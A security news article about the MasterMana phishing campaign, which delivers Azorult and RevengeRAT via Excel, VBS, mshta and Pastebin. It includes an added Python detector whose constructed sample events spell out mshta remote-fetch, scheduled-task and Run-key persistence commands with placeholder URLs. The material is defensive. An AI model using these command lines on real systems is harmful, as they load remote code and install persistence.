A malicious campaign targeting businesses around the world has been observed using a combination of pages hosted on Bit.ly, BlogSpot and Pastebin to spread Azorult and RevengeRAT malware.
The campaign, dubbed MasterMana by the Prevailion researchers who spotted it, relies on third-party services for its command and control (C2) and payload storage infrastructure, which allows the threat actors behind the attacks to disguise malicious traffic from security solutions.
“Based on the Tactics, Techniques and Procedures (TTP) exposed, we associated it – with moderate confidence – with the ‘Gorgon Group’, a well-known group that has been active for many years and attributed to multiple ongoing malicious campaigns,” says the Prevailion report.
Gorgon Group (aka Subaat) is a state-sponsored hacking group with connections to Pakistan that has been active since at least 2017, according to Palo Alto Networks Unit 42.
The group is known to have been behind various cybercrime and cyber espionage attacks, including, but not limited to, campaigns targeting government entities in the United States, Europe and Asia.
Chain of infection powered by third-party infrastructure
“This operation, which began as early as December 2018, appears financially motivated, given the seemingly indiscriminate targeting of work email addresses through phishing and the inclusion of specific functions to steal information associated with cryptocurrency wallets,” added Danny Adamitis and Matt Thompson in their report.
The malware is delivered to target computers through phishing emails carrying malicious Microsoft Excel attachments that, when opened, drop a VBS script payload.
The script opens a BlogSpot page that launches the legitimate Mshta (Microsoft HTML Application Host) utility to load a second-stage payload hosted on Pastebin. That payload is designed to kill all running Word, Excel, PowerPoint and Publisher processes and to configure scheduled tasks and registry keys for persistence.
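The chain above (Office document, script host, mshta.exe fetching remote content, Office process kills, then scheduled-task and Run-key persistence) leaves a recognisable trail in process-creation telemetry. The following is an added detection example, not code from the article or from Prevailion; it runs over constructed Sysmon-style events, and the hostnames, paths and task names in the sample data are placeholders.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample process-creation events (Sysmon Event ID 1 style); not real telemetry.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "explorer.exe", "image": "excel.exe",
     "cmdline": 'excel.exe "C:\\Users\\u\\Downloads\\invoice.xls"'},
    {"parent": "excel.exe", "image": "wscript.exe",
     "cmdline": 'wscript.exe "C:\\Users\\u\\AppData\\Local\\Temp\\a.vbs"'},
    {"parent": "wscript.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe https://placeholder-blog.blogspot.com/p/x.html"},
    {"parent": "mshta.exe", "image": "taskkill.exe",
     "cmdline": "taskkill /F /IM winword.exe /IM excel.exe /IM powerpnt.exe /IM mspub.exe"},
    {"parent": "mshta.exe", "image": "schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 60 /tn "Update" /tr "mshta https://pastebin.com/raw/PLACEHOLDER"'},
    {"parent": "mshta.exe", "image": "reg.exe",
     "cmdline": 'reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v x /t REG_SZ /d "mshta https://pastebin.com/raw/PLACEHOLDER"'},
    # A locally installed HTA launched from the desktop: no URL, should not alert.
    {"parent": "explorer.exe", "image": "mshta.exe",
     "cmdline": "mshta.exe C:\\Program Files\\Vendor\\setup.hta"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "excel.exe", "winword.exe", "powershell.exe"}
PASTE_HOSTS = re.compile(r"(blogspot\.com|pastebin\.com|bit\.ly)", re.I)   # services abused per the article
OFFICE_KILL = re.compile(r"/IM\s+(winword|excel|powerpnt|mspub)\.exe", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\b", re.I)

def classify(ev: Dict[str, str]) -> Optional[str]:
    """Return a detection tag for one event, or None if it matches no rule."""
    img, parent, cmd = ev["image"].lower(), ev["parent"].lower(), ev["cmdline"]
    low = cmd.lower()
    if img == "mshta.exe" and re.search(r"https?://", low):
        tag = "mshta_remote_url"                       # mshta loading remote content
        if PASTE_HOSTS.search(cmd):
            tag += "_paste_site"                       # hosted on a free third-party service
        if parent in SCRIPT_HOSTS:
            tag += "_from_script_host"                 # spawned by VBS/Office, as in this chain
        return tag
    if img == "taskkill.exe" and len(OFFICE_KILL.findall(cmd)) >= 2:
        return "office_process_kill"                   # bulk kill of Office applications
    if img == "schtasks.exe" and "/create" in low and ("mshta" in low or PASTE_HOSTS.search(cmd)):
        return "schtasks_persistence_mshta"            # scheduled task re-invoking mshta
    if img == "reg.exe" and RUN_KEY.search(cmd) and "mshta" in low:
        return "run_key_persistence_mshta"             # Run key re-invoking mshta
    return None

def detect(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Run every event through the rules and return (image, tag) pairs for hits."""
    hits = []
    for ev in events:
        tag = classify(ev)
        if tag:
            hits.append((ev["image"], tag))
    return hits
```

Correlating the hits by parent process (here all four alerts descend from the same mshta.exe instance) turns four medium-confidence signals into one high-confidence chain.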
In some cases, the final payload delivered by the MasterMana operators was the well-known RevengeRAT Remote Access Trojan (RAT), which can open remote shells and lets attackers manage system files, processes and services, modify the Windows registry, log keystrokes, harvest user passwords and access the webcam, among other capabilities.
Other attacks dropped the Azorult Trojan, a malware designed to exfiltrate as much sensitive information as possible, from bank credentials and cryptocurrency wallets to files, passwords, cookies and browser history.
Azorult is also known to act as a malware downloader and has previously been seen spreading information-stealing and cryptocurrency-related malware, as well as ransomware, as part of large-scale campaigns.
“In this case, the threat actors struck the perfect balance: sophisticated enough to avoid automated detection via third-party services and obfuscation while remaining below the APT sophistication level to avoid drawing attention to their campaign,” concludes Prevailion.
A very similar campaign, dubbed “Aggah” by researchers at Palo Alto Networks Unit 42 and spotted in March, has also been observed abusing Bit.ly, BlogSpot and Pastebin to distribute malware.
Even though some of the malicious techniques used in that campaign overlapped with those used by the Gorgon Group, Palo Alto Networks researchers said at the time that there was no “concrete evidence that this attack campaign is associated with Gorgon.”